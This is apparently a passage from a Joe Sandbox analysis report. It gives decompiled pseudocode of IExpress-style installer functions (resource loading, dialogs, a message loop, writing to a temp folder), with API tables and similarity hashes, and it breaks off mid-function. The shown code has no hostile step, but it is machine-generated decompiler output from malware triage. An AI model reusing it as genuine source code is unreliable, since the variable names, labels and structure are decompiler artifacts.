                                                                                                                                                                                                                                                			E00054169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0005468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0005468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E000544B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                                0x0005417d
                                                                                                                                                                                                                                                0x0005418f
                                                                                                                                                                                                                                                0x00054193
                                                                                                                                                                                                                                                0x000541b7
                                                                                                                                                                                                                                                0x000541d3
                                                                                                                                                                                                                                                0x000541e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000541e7
                                                                                                                                                                                                                                                0x000541d5
                                                                                                                                                                                                                                                0x000541d6
                                                                                                                                                                                                                                                0x000541d8
                                                                                                                                                                                                                                                0x000541d9
                                                                                                                                                                                                                                                0x000541da
                                                                                                                                                                                                                                                0x000541df
                                                                                                                                                                                                                                                0x000541e1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000541e1
                                                                                                                                                                                                                                                0x000541b9
                                                                                                                                                                                                                                                0x000541ba
                                                                                                                                                                                                                                                0x000541bc
                                                                                                                                                                                                                                                0x000541bd
                                                                                                                                                                                                                                                0x000541be
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000541be
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000530B4), ref: 00054189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000530B4), ref: 000541E7
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: 91e6f0a8c5a153704c0a26800576b28f2fe3f5799f9383c350c7bf3f2b3a2c9e
                                                                                                                                                                                                                                                • Instruction ID: 78e6c9c0745857d22df5818314cbb61672b117cf2aee29d813d99f580c86f294
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e6f0a8c5a153704c0a26800576b28f2fe3f5799f9383c350c7bf3f2b3a2c9e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA01D1B17407143BF72416658C9AFFB258EDBD579FF004125BF05E21C59A6CCC8941BA
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000519E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E000519E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x58004; // 0x5a679bd9
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E000543D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x59a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00056CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                                0x000519e0
                                                                                                                                                                                                                                                0x000519e0
                                                                                                                                                                                                                                                0x000519eb
                                                                                                                                                                                                                                                0x000519f2
                                                                                                                                                                                                                                                0x000519f9
                                                                                                                                                                                                                                                0x000519fc
                                                                                                                                                                                                                                                0x00051a01
                                                                                                                                                                                                                                                0x00051a2a
                                                                                                                                                                                                                                                0x00051a2e
                                                                                                                                                                                                                                                0x00051a3e
                                                                                                                                                                                                                                                0x00051a4f
                                                                                                                                                                                                                                                0x00051a62
                                                                                                                                                                                                                                                0x00051a6a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051a03
                                                                                                                                                                                                                                                0x00051a06
                                                                                                                                                                                                                                                0x00051a20
                                                                                                                                                                                                                                                0x00051a20
                                                                                                                                                                                                                                                0x00051a08
                                                                                                                                                                                                                                                0x00051a08
                                                                                                                                                                                                                                                0x00051a14
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00051a16
                                                                                                                                                                                                                                                0x00051a18
                                                                                                                                                                                                                                                0x00051a70
                                                                                                                                                                                                                                                0x00051a72
                                                                                                                                                                                                                                                0x00051a72
                                                                                                                                                                                                                                                0x00051a14
                                                                                                                                                                                                                                                0x00051a06
                                                                                                                                                                                                                                                0x00051a81

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00051A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00051A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 00051A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00051A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 00051A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                • Opcode ID: 801a382fd3d9d1ed062fa75757ab156ce17e23b82ad31c2ce7dd199406c874b4
                                                                                                                                                                                                                                                • Instruction ID: 2d4e159fff66f5a927abcd9a7ab24052979c67c73527c40b98549dd417be6a1e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 801a382fd3d9d1ed062fa75757ab156ce17e23b82ad31c2ce7dd199406c874b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2311A131601209AFEB51EF64DD08BEF7BB8EF4A312F108254FD2297191DA349E05CB96
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000563C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E000563C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x58004; // 0x5a679bd9
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00051781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				E0005658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x59124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x59124 = 0x80070052;
					_t37 = 0;
				}
				return E00056CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                                0x000563cb
                                                                                                                                                                                                                                                0x000563d2
                                                                                                                                                                                                                                                0x000563d8
                                                                                                                                                                                                                                                0x000563ea
                                                                                                                                                                                                                                                0x000563f3
                                                                                                                                                                                                                                                0x00056401
                                                                                                                                                                                                                                                0x00056402
                                                                                                                                                                                                                                                0x00056410
                                                                                                                                                                                                                                                0x00056415
                                                                                                                                                                                                                                                0x00056433
                                                                                                                                                                                                                                                0x00056438
                                                                                                                                                                                                                                                0x00056449
                                                                                                                                                                                                                                                0x00056463
                                                                                                                                                                                                                                                0x0005646d
                                                                                                                                                                                                                                                0x00056477
                                                                                                                                                                                                                                                0x00056477
                                                                                                                                                                                                                                                0x0005647a
                                                                                                                                                                                                                                                0x0005643a
                                                                                                                                                                                                                                                0x0005643a
                                                                                                                                                                                                                                                0x00056444
                                                                                                                                                                                                                                                0x00056444
                                                                                                                                                                                                                                                0x00056492

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000563EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-2312194364
                                                                                                                                                                                                                                                • Opcode ID: b6f37f911c287b6a7a704e6170b117ea913fbfd745933725a423e7f5867cd330
                                                                                                                                                                                                                                                • Instruction ID: a13a29e4bee2ad52afde1b0bcd670d76c7cbdfcd36c7222c28c83ce599dec5ab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6f37f911c287b6a7a704e6170b117ea913fbfd745933725a423e7f5867cd330
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7210571A0021CABDB10DF25DC85FEB77BCEB45312F004269F984A3180DAB55D888F64
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000547E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000547E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00051680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x591e0; // 0x26d7100
						 *(_t34 + 4) = _t11;
						 *0x591e0 = _t34;
						return 1;
					}
					_t25 =  *0x58584; // 0x0
					E000544B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x58584; // 0x0
				E000544B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                                0x000547e8
                                                                                                                                                                                                                                                0x000547f0
                                                                                                                                                                                                                                                0x000547f4
                                                                                                                                                                                                                                                0x0005480f
                                                                                                                                                                                                                                                0x00054811
                                                                                                                                                                                                                                                0x00054814
                                                                                                                                                                                                                                                0x00054814
                                                                                                                                                                                                                                                0x00054816
                                                                                                                                                                                                                                                0x00054817
                                                                                                                                                                                                                                                0x00054829
                                                                                                                                                                                                                                                0x0005482b
                                                                                                                                                                                                                                                0x0005482f
                                                                                                                                                                                                                                                0x0005484f
                                                                                                                                                                                                                                                0x00054852
                                                                                                                                                                                                                                                0x00054855
                                                                                                                                                                                                                                                0x00054855
                                                                                                                                                                                                                                                0x00054857
                                                                                                                                                                                                                                                0x00054858
                                                                                                                                                                                                                                                0x00054860
                                                                                                                                                                                                                                                0x00054865
                                                                                                                                                                                                                                                0x0005486a
                                                                                                                                                                                                                                                0x0005486f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054876
                                                                                                                                                                                                                                                0x00054831
                                                                                                                                                                                                                                                0x00054841
                                                                                                                                                                                                                                                0x00054847
                                                                                                                                                                                                                                                0x0005480b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005480b
                                                                                                                                                                                                                                                0x000547f6
                                                                                                                                                                                                                                                0x00054806
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00054E6F), ref: 000547EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00054823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00054847
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00054851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-2312194364
                                                                                                                                                                                                                                                • Opcode ID: 5cfddce1218040f8a4eae5f904eccdc330e7f93e97352a00136fc81ad030c69d
                                                                                                                                                                                                                                                • Instruction ID: 3d293f02fb14b134f3cb91218a669dc14d341efe1c915693e10385b61d236f6a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cfddce1218040f8a4eae5f904eccdc330e7f93e97352a00136fc81ad030c69d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1110675604B41AFEB658F349C18FFB3B9AEBC5306B148519EE4297341DE398C4A8B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00056517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00056517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x59a3c; // 0x50000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E000544B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                                0x0005651f
                                                                                                                                                                                                                                                0x0005652a
                                                                                                                                                                                                                                                0x00056534
                                                                                                                                                                                                                                                0x0005656b
                                                                                                                                                                                                                                                0x00056577
                                                                                                                                                                                                                                                0x0005657c
                                                                                                                                                                                                                                                0x00056536
                                                                                                                                                                                                                                                0x0005653e
                                                                                                                                                                                                                                                0x00056542
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056544
                                                                                                                                                                                                                                                0x00056547
                                                                                                                                                                                                                                                0x0005654c
                                                                                                                                                                                                                                                0x00056549
                                                                                                                                                                                                                                                0x00056549
                                                                                                                                                                                                                                                0x00056549
                                                                                                                                                                                                                                                0x0005655e
                                                                                                                                                                                                                                                0x00056560
                                                                                                                                                                                                                                                0x00056569
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056569
                                                                                                                                                                                                                                                0x00056542
                                                                                                                                                                                                                                                0x00056587

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00050000,000007D6,00000005), ref: 0005652A
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00050000,00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00056538
                                                                                                                                                                                                                                                • DialogBoxIndirectParamA.USER32(00050000,00000000,00000547,000519E0,00000000), ref: 00056557
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00056560
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                • Opcode ID: 5882d6d9f0abce637f6e523c53c93b3fc23cd3914cb34092c5dcebc30e794288
                                                                                                                                                                                                                                                • Instruction ID: 4e815405683d057535157589f1fd8e50054d4d5373f417848234298db5e65cdb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5882d6d9f0abce637f6e523c53c93b3fc23cd3914cb34092c5dcebc30e794288
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C101DB72240B15BBEB105F699C48DBB7AACEB85763F400215FE1093190EB76CD5086B1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00053680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00053680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                                0x0005368c
                                                                                                                                                                                                                                                0x0005368f
                                                                                                                                                                                                                                                0x00053691
                                                                                                                                                                                                                                                0x0005369f
                                                                                                                                                                                                                                                0x000536a7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000536ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000536bc
                                                                                                                                                                                                                                                0x000536bc
                                                                                                                                                                                                                                                0x000536c0
                                                                                                                                                                                                                                                0x000536cb
                                                                                                                                                                                                                                                0x000536c2
                                                                                                                                                                                                                                                0x000536c4
                                                                                                                                                                                                                                                0x000536c4
                                                                                                                                                                                                                                                0x000536da
                                                                                                                                                                                                                                                0x000536e0
                                                                                                                                                                                                                                                0x000536e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000536e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000536ba
                                                                                                                                                                                                                                                0x000536ed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0005369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 000536CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: 04945a626a2a65dba1b13a4542ec199f433fb25a5deedbed3aab2b4d3457f531
                                                                                                                                                                                                                                                • Instruction ID: 335f7f978241698f55caf3001fcd55126717eb5ef6ac5e201d4d76343dec7a85
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04945a626a2a65dba1b13a4542ec199f433fb25a5deedbed3aab2b4d3457f531
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60018472A002187BDB304AA65C48EEB7ABCEB86B52F00421DBD05E2180D5648A44C675
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000565E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E000565E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
